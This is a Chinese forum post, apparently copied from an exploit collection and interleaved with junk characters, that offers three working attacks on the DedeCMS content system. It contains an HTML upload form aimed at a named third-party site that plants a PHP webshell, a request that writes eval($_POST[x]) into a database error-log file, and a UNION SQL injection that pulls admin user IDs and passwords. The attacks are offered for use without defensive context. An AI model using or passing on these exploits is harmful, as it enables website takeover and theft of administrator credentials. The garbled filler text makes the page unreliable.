# u4 d; A$ G! M; H1 e! b6 x* U: z9 J- a1 W/ z8 T7 t5 Y" W" h

" a& e0 m3 x, g
* k, H9 K) s$ S+ [9 s* O7 \4 ~7 i2 E. \

6 a( S4 Q' D0 ^! I5 C# K) E$ O- V! j  I" d. {7 _

8 p) ?. Z% k( Q, o3 w& U; r& F% m织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
  Y% z0 s0 ~1 U: s7 R& z8 b# ~- k7 m# v<html>
4 U- A4 q$ w. C  P/ K5 P. E; y8 j- G<head>( o. ?- L& ?) |2 n4 d0 a! M
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
) p, h) @3 u% C% a/ P! ~</head>; a, m  j/ o/ E- C
<body style="FONT-SIZE: 9pt">) E. j" t  v! B
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />6 a2 G* D( |+ x8 Q: V
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
& p; t( B" K. Z+ O<input type='hidden' name='activepath' value='/data/cache/' />
0 Z  Q6 X( ]/ n0 q9 T7 g<input type='hidden' name='cfg_basedir' value='../../' />
- Q1 `' c% X& `3 i; E<input type='hidden' name='cfg_imgtype' value='php' />  s( {+ ?  s2 A4 e9 t5 r
<input type='hidden' name='cfg_not_allowall' value='txt' />
0 Y5 k% \( t. o: T9 f- r& X: I<input type='hidden' name='cfg_softtype' value='php' />
" g/ Y% X; s6 D, G  d* @<input type='hidden' name='cfg_mediatype' value='php' />& t) V5 A7 Y" v8 N  p' l& Q) w9 U
<input type='hidden' name='f' value='form1.enclosure' />
! \% O, Y" j7 t' E2 H<input type='hidden' name='job' value='upload' />
) Z* |% |% i0 R* z# ^6 Z<input type='hidden' name='newname' value='fly.php' />
* @- j% A8 N" F0 k" n# o- l0 jSelect U Shell <input type='file' name='uploadfile' size='25' />
% v( U) u1 o! O( E% g$ s<input type='submit' name='sb1' value='确定' />
& w" R9 g$ G$ `( X  ?) a</form>, q+ u& S: Y0 u  B
<br />It's just a exp for the bug of Dedecms V55...<br />
1 E/ a) b1 M& O' M8 |Need register_globals = on...<br />$ k4 \- O+ p& O5 M0 E/ Y
Fun the game,get a webshell at /data/cache/fly.php...<br />
3 J+ w8 _9 o7 M  s+ H</body>5 D' y* b. u0 d
</html>
! F' G' D% F" ]6 @) m- R
2 ^) _2 n8 I1 M" U& q: n; _4 Z7 P
+ L1 V0 H. }# a" V3 Y) g- B" X, j, z4 S2 c3 B) a, ~' n

3 B  S2 J( q0 z& ?1 ]7 t5 n
8 @( Z/ o& w' e2 f9 p2 R8 ^2 M6 w$ W9 g3 j% V6 ^; Q. D# e

: A& W3 P& g$ j$ D. G4 K
8 g8 `) E$ w5 t# h
/ I9 I1 b. P8 n* G2 _2 [' l. L3 d
& C: s! |. ~" M$ \, k织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞6 _/ H+ r  _: O: c
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
9 a) y; g: y* ^% h6 g" X" s5 i1. 访问网址:/ ?2 N- G/ l% U7 S1 ^, |& L5 B0 W, E
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 g$ t2 N; [: N3 U* E
可看见错误信息
$ z5 |6 q% G8 }( \7 i1 _
) u4 D' f( R  O: Q5 R
$ R0 }, t6 E  Z: f2 e6 z/ \* m  D2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
/ \) g- }+ B; Dint(3) Error: Illegal double '1024e1024' value found during parsing
* u% C  l1 d8 C1 XError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
7 l* U1 w4 e+ u
+ ]: W8 ]2 u4 j$ y# P# d
$ H8 H' f. v1 k  ]5 ?3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是  a6 c, f  ]! P) [" q# {( y& S

+ q5 _4 j% k1 l6 P7 y8 X! V1 R; `4 t  J* U
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. q2 D0 Z, k9 {; _( E% H& O; l+ \  `2 v+ I* M6 L* a8 @/ y
% \" I" U, \( @$ c
按确定后的看到第2步骤的信息表示文件木马上传成功.0 B8 m  E# r+ e

6 a) u. P3 g& u7 v/ E! E+ E" U6 [
$ z" I  ^0 U5 ~4 Y
( o3 }1 R* e8 |% Z7 f& J6 \
3 X. I, V5 Y  x  a/ ^5 W& U0 B6 t8 W* W) c4 }' k+ @4 g
# Q7 z( Y& T3 K/ L
  p$ k/ x$ R; A* ^' H. G) ]
7 {- [! N, w' A4 Y0 G9 Z* i

0 v% ]( h' C) d' ?" K. f3 Z/ K, I: |
  X% H4 J( `# p; @1 {4 V+ O- [8 I, q
' f3 s  D' f# |% d  r0 T
织梦(DedeCms)plus/infosearch.php 文件注入漏洞, t4 [$ E! o- O0 D% p
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表